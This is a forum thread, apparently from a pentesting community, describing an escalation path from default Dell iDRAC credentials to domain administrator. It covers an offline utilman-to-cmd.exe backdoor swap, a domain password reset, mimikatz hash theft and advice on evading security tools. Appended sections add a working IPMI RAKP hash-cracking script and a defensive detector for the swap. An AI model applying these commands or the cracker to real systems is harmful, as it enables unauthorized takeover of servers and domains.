From iDRAC to domain administrator.
by rumprump111 - Friday March 14, 2025 at 03:06 PM
#1
Well, the other day I participated in an interesting penetration test and implemented an interesting way to escalate privileges to Domain Administrator. So I decided to replicate the scenario on my own bench to share this interesting way with fellow pentesters who can replicate this path.

Let's start by defining what iDRAC is. Let's use an AI-generated hint: “The Dell Integrated Remote Access Controller (iDRAC) is a tool that allows IT administrators to remotely or locally manage, monitor, and upgrade Dell PowerEdge servers. The iDRAC is a mainboard management controller built into Dell servers that includes both hardware and software.” Essentially, with it, you have the ability to control your virtual machine!

Typically, these interfaces are protected by a login and password, but pentests can reveal that default credentials are being used or that there are vulnerable IPMI v2.0 password hashes. So, let's say you found the default credentials, which are usually root:calvin, or let's say you cracked a hash obtained through a vulnerability in IPMI. What's next? For reference, once you have successfully logged into iDRAC, you will see the following:
[Image: c73daf50c3dd1324a2510f09f7526467.png]

When you look at the screen above, what do you think your options are? How about waiting for the administrator to click on the virtual console screen in the lower right corner and log in so you can take advantage of this? An acceptable method, but we want to achieve the highest level of privileges in Active Directory. So let's make it happen!

If you have any experience with back-end infrastructure, you know that you can reset the built-in Windows Server administrator account using utilman. Now let's go back to the screenshot above. We can see that this is a Windows Server 2016 operating system, with the same Windows architecture, just on a different platform. So, if we apply the utilman reset method to it, then in theory, it should work, right? Let's get started!

The iDRAC architecture requires that we plug in virtual media to perform this reset. Let's download an ISO image of Windows Server 2016, and then plug it into our operating system in iDRAC. I've added a few marks to the screenshot so you can see the steps to take after successfully downloading the ISO.

1) Load.

2) We mark it up.

3) Then we close the dialog.

[Image: f2fbfeed73af0c3e703e16fd75d4c029.png]

Now that we've done that, let's click on “Boot Controls” and select the highlighted option below. This tells iDRAC to boot from the ISO we just added:
[Image: a0912a822d3ba9c98309e69e8a939f8c.png]

Shutting down the system:

[Image: a293526c6f81b25a6889b3cb56df9eaa.png]

Reboot and you will encounter a screen like the screenshot below, where we will click the highlighted option:
[Image: cdd57dd733f3bab19273f0c004b20726.png]

We will then be presented with another screen, where we will click on the highlighted option below:
[Image: 5c0dbe73c7485c96cc0b8a057ab0086a.png]

We should end up here (make sure you're in the right directory):
[Image: a7c27f245edaafb5f98e5aa06fdf0c31.png]

Now let's go to the system32 directory and run some commands. Please take a look at the screenshot below:
[Image: 17cc371073753e7bcdb49ea276f27fb8.png]

Let me explain what we do:
ren utilman.exe utilman.123

We're renaming our utilman.exe to utilman.123; essentially, we're backing it up so we can bring it back once we complete our task.

copy cmd.exe utilman.exe

Now we replace utilman.exe with the command prompt (cmd.exe).

When this is done, type “exit” and boot Windows normally. Once Windows is up, you should end up here:

[Image: 9fbde1601318bac61bce105077f03406.png]

Click on the highlighted option, and now your Special Features option should bring up a command prompt where we will reset the built-in administrator account:

[Image: 7497a3df8d1128e449017db12fbbb188.png]

If you are facing a domain controller, just add /domain to the end of the command we entered. Now let's enter the new password and see if we log in:

[Image: f3276b286030b35f17a93d8a01fcd7d8.png]

If you were lucky and it was a domain controller, you are now a domain administrator and can continue to enjoy the pentest. Honestly, for obvious reasons, you shouldn't be doing this on a domain controller during a pentest.

I wasn't so lucky. In my case, it was a domain-joined machine. With the hope that domain admins sometimes interact with it, I downloaded mimikatz and tried to get the domain admin hash:
[Image: 76908b884dbf78c079503940a77b0c25.png]

Take that hash and log in to the domain controller; congratulations, you are a domain administrator:

[Image: 2677a55279a94cb7d8ede604bd074ade.png]

Keep in mind that there are other options (like DCSync). It's entirely up to you.

I have omitted some steps. For example, as we know, during testing we may encounter security tools that can hinder us. You will have to use your skills to bypass them and run the necessary tools (such as mimikatz) to get to the target. This was one of the problems I encountered. Also, to keep the blog from getting too long, I eliminated the step of undoing the changes I made.

Have a great hack!
Reply
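Added example, not part of the post above: the "hash obtained through a vulnerability in IPMI" the author mentions is the RAKP message 2 authentication code, an HMAC-SHA1 keyed with the user's password that the BMC hands to any client that names a valid user (the IPMI 2.0 RAKP weakness, CVE-2013-4786). The script below rebuilds that HMAC from the RAKP fields, emits the hashcat 7300 line, and runs an offline wordlist check. Every session ID, random number, GUID and the wordlist are constructed here so it runs offline; the function names are mine, not ipmitool's or hashcat's.

```python
"""Offline check of an IPMI 2.0 RAKP-HMAC-SHA1 authentication code.

The BMC computes HMAC(password, SIDm || SIDc || Rm || Rc || GUIDc || ROLEm ||
ULENm || UNAME) and returns it in RAKP message 2 before the client has proven
anything, so the value can be brute-forced offline. All inputs below are
constructed for the demo, not captured from a real iDRAC.
"""
import hashlib
import hmac

# Constructed RAKP message 1/2 fields (hypothetical values).
SID_M = bytes.fromhex("a4a3a2a0")                        # remote console session ID
SID_C = bytes.fromhex("02000000")                        # BMC-assigned session ID
R_M = bytes.fromhex("3c1f5a7e9d0b2c4e6f8a1b3d5e7f9a0c")  # console random (16 bytes)
R_C = bytes.fromhex("9e8d7c6b5a4f3e2d1c0b0a9f8e7d6c5b")  # BMC random (16 bytes)
GUID_C = bytes.fromhex("44454c4c4c0010428039b8c04f4e3332")  # BMC GUID (16 bytes)
ROLE_M = b"\x14"   # requested privilege: Administrator (0x04) + name-only lookup bit
USERNAME = b"root"


def rakp2_salt(sid_m, sid_c, r_m, r_c, guid_c, role_m, username):
    """Concatenate the fields in the order the spec HMACs them.
    ULENm is the one-byte username length that precedes UNAME."""
    return sid_m + sid_c + r_m + r_c + guid_c + role_m + bytes([len(username)]) + username


def rakp2_auth_code(password: bytes, salt: bytes) -> bytes:
    """RAKP-HMAC-SHA1 keyed with the user's password. HMAC zero-pads short
    keys itself, so using the raw password matches the BMC's 20-byte KUID."""
    return hmac.new(password, salt, hashlib.sha1).digest()


def to_hashcat_7300(salt: bytes, auth_code: bytes) -> str:
    """hashcat mode 7300 line: <salt hex>:<hmac hex>."""
    return f"{salt.hex()}:{auth_code.hex()}"


def crack(salt: bytes, auth_code: bytes, wordlist) -> str | None:
    """Return the first wordlist entry whose HMAC matches, else None."""
    for candidate in wordlist:
        if hmac.compare_digest(rakp2_auth_code(candidate.encode(), salt), auth_code):
            return candidate
    return None


def crack_7300_line(line: str, wordlist) -> str | None:
    """Same check, but starting from a hashcat 7300 formatted line."""
    salt_hex, auth_hex = line.strip().split(":")
    return crack(bytes.fromhex(salt_hex), bytes.fromhex(auth_hex), wordlist)


# Constructed "capture": the BMC side computes the code with the Dell default.
SALT = rakp2_salt(SID_M, SID_C, R_M, R_C, GUID_C, ROLE_M, USERNAME)
CAPTURED = rakp2_auth_code(b"calvin", SALT)
WORDLIST = ["admin", "password", "Dell1234", "calvin"]

if __name__ == "__main__":
    print(to_hashcat_7300(SALT, CAPTURED))
    print("recovered password:", crack(SALT, CAPTURED, WORDLIST))
```

Note that the salt is 62 bytes for a 4-character username, so a GPU cracker is the right tool for anything beyond a short list; the script only shows what the cracker is actually computing. Because the BMC never rate-limits RAKP message 1, the fix is not a longer password alone but disabling IPMI over LAN where it is not needed and isolating the iDRAC network.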
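Added example, not part of the post above: the check a defender (or a pentester cleaning up) would want after the utilman steps described in the post. The swap leaves two artefacts on disk, an accessibility binary that is byte-for-byte a copy of cmd.exe and a renamed backup such as utilman.123. The script below hashes the accessibility binaries in a System32 directory against the shells, flags leftover renames, and exercises itself on a constructed fake System32 directory so it runs anywhere. Function names and the fake file bodies are mine.

```python
"""Detect the Ease of Access binary swap (utilman.exe -> copy of cmd.exe).

Added example with constructed input. Point find_swapped_binaries() and
find_rename_leftovers() at a real C:\\Windows\\System32 on a live host.
"""
import hashlib
import os
import tempfile

# Every binary Windows launches from the logon screen before authentication;
# any of them duplicating a shell is a backdoor, not just utilman.exe.
ACCESSIBILITY_BINARIES = [
    "utilman.exe", "sethc.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
]
SHELLS = ["cmd.exe", "powershell.exe"]


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_binaries(system32: str) -> dict:
    """Map each accessibility binary whose content hashes identically to a
    shell onto that shell's name. Only catches a verbatim copy; a modified
    binary needs an Authenticode check instead."""
    shell_hashes = {}
    for name in SHELLS:
        p = os.path.join(system32, name)
        if os.path.isfile(p):
            shell_hashes[sha256_of(p)] = name
    findings = {}
    for name in ACCESSIBILITY_BINARIES:
        p = os.path.join(system32, name)
        if os.path.isfile(p):
            digest = sha256_of(p)
            if digest in shell_hashes:
                findings[name] = shell_hashes[digest]
    return findings


def find_rename_leftovers(system32: str) -> list:
    """List files like utilman.123 or sethc.exe.bak: an accessibility binary's
    stem under any name other than its canonical .exe."""
    stems = {n[: -len(".exe")] for n in ACCESSIBILITY_BINARIES}
    leftovers = []
    for entry in os.listdir(system32):
        lower = entry.lower()
        stem, _, _ = lower.partition(".")
        if stem in stems and lower != stem + ".exe":
            leftovers.append(entry)
    return sorted(leftovers)


def build_demo_system32() -> str:
    """Constructed fake System32 in the state the post leaves behind after
    'ren utilman.exe utilman.123' and 'copy cmd.exe utilman.exe'."""
    d = tempfile.mkdtemp(prefix="fake_system32_")
    fake_cmd = b"MZ fake cmd.exe body"
    files = {
        "cmd.exe": fake_cmd,
        "utilman.exe": fake_cmd,                                # swapped copy
        "utilman.123": b"MZ fake original utilman.exe body",   # backup left behind
        "sethc.exe": b"MZ fake sethc.exe body",                # untouched
    }
    for name, body in files.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(body)
    return d


if __name__ == "__main__":
    demo = build_demo_system32()
    print("swapped:", find_swapped_binaries(demo))
    print("leftovers:", find_rename_leftovers(demo))
```

Two caveats for a live host: the same backdoor can be planted without touching any file by setting a Debugger value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe, so those keys need checking too, and a tampered rather than copied binary will not hash-match a shell, which is why Get-AuthenticodeSignature on each accessibility binary is the stronger check. Offline boot from attacker-supplied media, which is what the post relies on, is what BitLocker with TPM protection and an iDRAC password that is not root:calvin are there to stop.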
#2
Nice attack chain
Reply

